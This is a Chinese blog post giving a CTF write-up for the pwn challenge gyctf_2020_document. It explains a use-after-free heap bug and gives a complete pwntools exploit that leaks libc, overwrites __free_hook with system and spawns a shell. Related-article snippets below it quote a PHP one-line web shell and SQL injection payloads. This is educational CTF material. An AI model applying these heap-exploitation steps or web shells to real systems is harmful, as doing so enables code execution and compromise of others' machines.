gyctf_2020_document(uaf)

最新推荐文章于 2022-06-29 22:39:06 发布
最新推荐文章于 2022-06-29 22:39:06 发布
阅读量994 收藏
点赞数
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/121321652
版权

gyctf_2020_document:

保护全开
请添加图片描述

漏洞分析:

delete函数里指针未清零
请添加图片描述

大致思路:

这题限制了add时chunk的size,为0x8和0x80,edit时只能从+0x10处改0x70个字符
1.先add一个chunk,在add一个chunk,这个chunk里的name填/bin/sh\x00
(这时0x8chunk中存有指向binsh地址的指针了),我们释放第一个chunk,由于0x80大小,释放到unsortbin中,我们show,就能泄露libc
2.我们接下来的目的是控制申请0x8大小中存的指针为free_hook
再add一个chunk时,0x8的控制chunk会从unsortbin中割0x20,剩下的unsortbin的chunk放入small_bin中,但由于edit时只能从+0x10处改0x70个字符,我们故技重施再add一个chunk,仍旧从small_bin中割0x20,我们就能改到0x8中存的指针为free_hook了
3.我们用edit改free_hook为system
4.利用原本有存有binsh地址的0x8chunk,delete它就是执行system(/bin/sh)

exp:

from pwn import *
local_file  = './gyctf_2020_document'
local_libc  = './libc-2.23.so'
remote_libc = './libc-2.23.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn',26665)
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data)
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims                         :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
o_g_32_old = [0x3ac3c, 0x3ac3e, 0x3ac42, 0x3ac49, 0x5faa5, 0x5faa6]
o_g_32 = [0x3ac6c, 0x3ac6e, 0x3ac72, 0x3ac79, 0x5fbd5, 0x5fbd6]
o_g_old = [0x45216,0x4526a,0xf02a4,0xf1147]
o_g = [0x45226, 0x4527a, 0xf0364, 0xf1207]
def debug(cmd=''):
     gdb.attach(r,cmd)
#---------------------------------
def add(name,sex,info):
        sla('Give me your choice : \n','1')
        sa('input name\n',name)
        sla('input sex\n',str(sex))
        sa('input information\n',info)
def show(index):
        sla('Give me your choice : \n','2')
        sla('Give me your index : \n',str(index))
def edit(index,info):
        sla('Give me your choice : \n','3')
        sla('Give me your index : \n',str(index))
        sla('Are you sure change sex?\n','Y\n')
        sa('Now change information\n',info)
def delete(index):
        sla('Give me your choice : \n','4')
        sla('Give me your index : \n',str(index))
#------------------------------------------
add('a'*8,0x0,'b'*0x70)
add('/bin/sh\x00',0x1,'d'*0x70)
#--------------------------------------
delete(0)
show(0)
libc_base=uu64(ru('\x7f')[-6:])-88-0x10-libc.sym['__malloc_hook']
system=libc_base+libc.sym['system']
free_hook=libc_base+libc.sym['__free_hook']
print 'free_hook='+str(hex(free_hook))
#-----------------------------------------
add('e'*8,0x2,'f'*0x70)
add('g'*8,0x3,'h'*0x70)
edit(0,p64(0)+p64(0x21)+p64(free_hook-0x10)+p64(1)+p64(0)+p64(0x51)+'a'*0x40)
edit(3,p64(system)+'\x00'*0x68)
delete(1)
#debug()
r.interactive()
Nq0inaen
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwngyctf_2020_borrowstack
Nothing
03-02 1616
例行检查 程序逻辑 看到buf缓冲区有0x10大小溢出,且可以控制bss段上的bank,可以用栈迁移做,这题的bss段离got表较近,在迁移时尽量往高地址迁移,防止在rop时破坏got表上数据。 from pwn import * io=remote('node3.buuoj.cn','29302') bank=0x0601080 leave=0x400699 puts_plt=0x0400...
2021_UAF_SE_Nhom06
03-20
【标题】"2021_UAF_SE_Nhom06" 指的可能是一个软件工程项目的代码库,其中“UAF”可能是大学或机构的缩写,“SE”代表“Software Engineering”(软件工程),而“Nhom06”可能是项目组的编号或者课程的学期编号。...
gyctf_2020_document
m0_57754423的博客
06-29 756
gyctf_2020_document buuoj
[BUUCTF]PWN——gyctf_2020_documentUAF
mcmuyanga的博客
03-22 732
gyctf_2020_document 例行检查,64位程序,保护全开 漏洞在free chunk的时候 简单看一下其他几个功能函数 add() 像我这样的新手,可以申请几个chunk看一下,方便理清楚堆的内部情况 show(),根据存放在bss段的0x202060堆指针数组来输出对应的chunk里的值 edit() 利用思路 申请一个chunk,释放掉,在show,由于存在uaf,这样就泄露了libc 泄露libc后,由于第一个chunk被释放了,并且edit函数编辑的是chun
gyctf_2020_borrowstack
、moddemod
07-08 384
注意上图,因为bss与got表位置比较近,所以要尽可能的抬高栈顶指针即rsp,不然在后续调用其他函数的时候,会因为一些push操作或者sub使得栈顶指针减小覆盖到got中的内容导致无法泄露libc或者使得程序无法正常运行… from pwn import * from LibcSearcher import * context.log_level = 'debug' proc_name = './gyctf_2020_borrowstack' p = process(proc_name) p = r..
uaf42.zip_uaf42_uaf42 design_uaf42-data
最新发布
09-23
标题中的“uaf42.zip_uaf42_uaf42 design_uaf42-data”表明这是一份关于“uaf42”设计的压缩文件,重点在于“uaf42”的设计及其相关数据。描述中提到的是使用“uaf42”设计的有源滤波器,并记录了高通滤波器的设计...
fido_uaf_certification_adapter:金雅拓FIDO UAF认证服务器的认证适配器
05-15
项目名称FIDO UAF一致性工具适配器先决条件Gematlo FIDO UAF服务器已启动并正在运行。正在安装将适配器部署到Tomcat 8.x应用程序服务器。 FIDO UAF服务器的URL由环境变量UAF_SERVER设置已知问题/局限性不支持TLS ...
fido-uaf-v1.0-rd-20141008.zip_FIDO UAF1.0Client_U2F_fido uaf1.0
09-19
FIDO U2F协议依赖于一个加强的加密第二...最终用户携带一个简单的U2F设备可以用于任何支持该协议的应用上。用户得到一个通过一个简单的KEY设备得到一个安全的环境。这个文档是对U2F协议和一个阅读详细文当前的概述。
eID_fido-uaf-core
05-14
标题 "eID_fido-uaf-core" 暗示了这是一个与电子身份证(eID)相关的项目,它利用了FIDO UAF(Universal Authentication Framework)核心技术。FIDO UAF是一种安全的身份验证标准,旨在提供强认证,以保护用户免受...
CTF从入门到提升(二).docx
12-18
CTF从入门到提升(二).docx
GYCTF2020_Writeup
Lethe's Blog
03-15 2559
Blacklist 一到注入题,和2019强网杯的随便住基本一致,但是多过滤了set、prepare、alter、rename: return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject); 获取表名和列名的方式与原题一致,而获取数据可以参考这篇文章:http...
BUUCTF:[GYCTF2020]Blacklist
末初的CSDN博客
11-09 442
https://buuoj.cn/challenges#[GYCTF2020]Blacklist 和强网杯那道随便注一样,只不过过滤更多了 return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject); ?inject=1';show databases--+ ?inject=-1';show tables;--+ ?inject=-1';show colu
文件上传漏洞详解(CTF篇)
nobugnomoney的博客
09-16 1万+
需要了解的前置知识: 1.什么是文件上传: 文件上传就是通过流的方式将文件写到服务器上 文件上传必须以POST提交表单 表单中需要 <input type="file" name="upload"> 2.一句话木马 <?php eval($_POST['a']) ?> 其中eval就是执行命令的函数,**$_POST[‘a’]**就是接收的数据。eval函数把接收的数据当作PHP代码来执行。这样我们就能够让插入了一句话木马的网站执行我们传递过去的任意PHP语句。这便是一句话木马
CTF杂项之总结(一)
weixin_47793142的博客
06-06 4922
最近准备CTF比赛,刷题有感,故作总结。 题1: 打开压缩包,得到名为key的exe文件。第一猜想可能是小程序逆向,所以尝试打开运行。系统提示:无法打开的可执行文件。 好的,右键选择属性,查看是否有猫腻。没有任何信息。 右键选择010或者notepad++打开。得到如下信息:看到文件头的关键信息—— data:image/jpg;base64 这是jpg图片base64隐写的关键字。在网售搜寻图片base64转码工具,转码得到原图片。是一张二维码。扫码得到flag。 总结: 1.拿到题目时,应当首先查看是否
CTF/CTF练习平台-XSS【xss注入及js unicode编码及innerHTML】
热门推荐
Sp4rkW的博客
08-31 1万+
原题内容: http://103.238.227.13:10089/ Flag格式:Flag:xxxxxxxxxxxxxxxxxxxxxxxx 题目有点坑啊,注入点都没说明,去群里问的,这题注入点为id(get方式),id的值会进行替换后进入s 补充了这个,好了,继续做题 右键源码 &lt;script&gt; var s=""; docu...
CTF(一)
Hack
11-18 6650
    进入夺旗页面,发现是一个js编写的2048游戏,但是感觉不是玩2048这么简单, 查看源码 &lt;!doctype html&gt; &lt;html lang="en"&gt; &lt;head&gt; &lt;meta charset="UTF-8"&gt; &lt;title&gt;
CTF攻防世界web初级区详解
qq_62540010的博客
12-05 4314
最近几天刚刚接触了ctf,去尝试了一下攻防世界web区的新手篇题目,以下解题过程记录一下自己的学习体会与心得,如果哪里有错可以在评论区告诉我,我及时改正。 1.view_source 1.1获取场景后: 1.2根据题目要求,我们需要查看网页源代码,打开方式一种是鼠标右键打开,一种是按F12键,题目规定无法右键,所以我们按F12打开,如图: 1.3第二种解法:在其他网页打开源代码后把地址换成该网页地址,即view-source:后加上该网页地址,如图: 至此拿到flag,第一题完成 2.robot
攻防世界(pwn)babyheap(一些常见的堆利用方法)
PLpa的博客
03-22 2016
前言: 此题攻击链路:null_off_by_one修改堆块信息 => UAF泄露libc基址和其他有用信息 => fastbin attack申请堆块到指定地址 => 利用realloc_hook来调整堆栈 => one_gadget get shell。 64位程序,保护全开。 程序提供增删查操作,没有改操作。由于题目已经给了libc-2.23文件(虽然给错了)说明...
UAF:统一企业架构框架详解
"UAF-for-Incose" Unified Architecture Framework(UAF)是一种企业架构框架,它是Unified Profile for DoDAF and MoDAF (UPDM)的下一代版本,有时也被称为UPDM 3。UAF的设计目的是为类似于DoDAF(Department of ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值